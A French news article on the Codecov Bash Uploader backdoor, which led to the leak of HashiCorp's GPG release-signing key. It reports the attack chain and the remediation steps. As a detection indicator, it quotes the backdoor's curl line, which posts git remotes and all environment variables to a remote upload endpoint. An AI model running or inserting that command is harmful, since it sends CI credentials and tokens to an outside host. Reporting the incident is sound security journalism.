L'injection de code malveillant dans le script Codecov a conduit à la compromission de la clé PGP de HashiCorp.

La société HashiCorp, connue pour le développement des outils open source Vagrant, Packer, Nomad et Terraform, a annoncé la fuite d'une clé GPG secrète utilisée pour créer des signatures numériques vérifiant les releases. Les attaquants ayant eu accès à la clé GPG pouvaient potentiellement apporter des modifications cachées aux produits de HashiCorp, en les certifiant avec une signature numérique valide. Cependant, la société a déclaré qu'aucune trace de tentatives de modification n'a été trouvée lors de l'audit effectué.

Actuellement, la clé GPG compromise a été révoquée et un nouveau clé a été mise en circulation à la place. Le problème a uniquement affecté la vérification à l'aide des fichiers SHA256SUM et SHA256SUM.sig, et n'a pas concerné la création de signatures numériques pour les paquets Linux DEB et RPM fournis via releases.hashicorp.com, ainsi que les mécanismes de validation des releases pour macOS et Windows (AuthentiCode).

La fuite s'est produite en raison de l'utilisation dans l'infrastructure du script Codecov Bash Uploader (codecov-bash), conçu pour télécharger des rapports de couverture à partir de systèmes d'intégration continue. Lors de l'attaque contre la société Codecov, une backdoor a été discrètement intégrée dans ce script, permettant l'envoi de mots de passe et de clés de chiffrement aux serveur cybercriminels.

Pour le piratage, les attaquants ont exploité une faille dans le processus de création de l'image Docker de Codecov, permettant d'extraire des données d'accès à GCS (Google Cloud Storage), nécessaires pour apporter des modifications au script Bash Uploader, distribué depuis codecov.io. Les modifications ont été effectuées dès le 31 janvier, restant non détectées pendant deux mois et permettant aux attaquants d'extraire des informations stockées dans les environnements des systèmes d'intégration continue des clients. Grâce au code malveillant ajouté, les attaquants pouvaient obtenir des informations sur le dépôt Git testé ainsi que sur toutes les variables d'environnement, y compris celles contenant des jetons, des clés de chiffrement et des mots de passe, transmis aux systèmes d'intégration continue pour accéder au code des applications, aux dépôts et à des services tels qu'Amazon Web Services et GitHub.

En plus de l'appel direct, le script Codecov Bash Uploader a été utilisé dans d'autres téléchargeurs tels que Codecov-action (Github), Codecov-circleci-orb et Codecov-bitrise-step, dont les utilisateurs sont également concernés par le problème. Tous les utilisateurs de codecov-bash et des produits associés sont recommandés d'auditer leurs infrastructures, ainsi que de changer leurs mots de passe et clés de chiffrement. Pour vérifier la présence d'une porte dérobée dans le script, on peut rechercher la ligne curl -sm 0.5 -d «$(git remote -v)<<<< ENV $(env)» http:///upload/v2 || true

Source : opennet.ru

Acheter un hébergement fiable pour les sites avec protection DDoS, serveurs VPS VDS 🔥 Acheter un hébergement fiable pour les sites avec protection DDoS, serveurs VPS VDS | ProHoster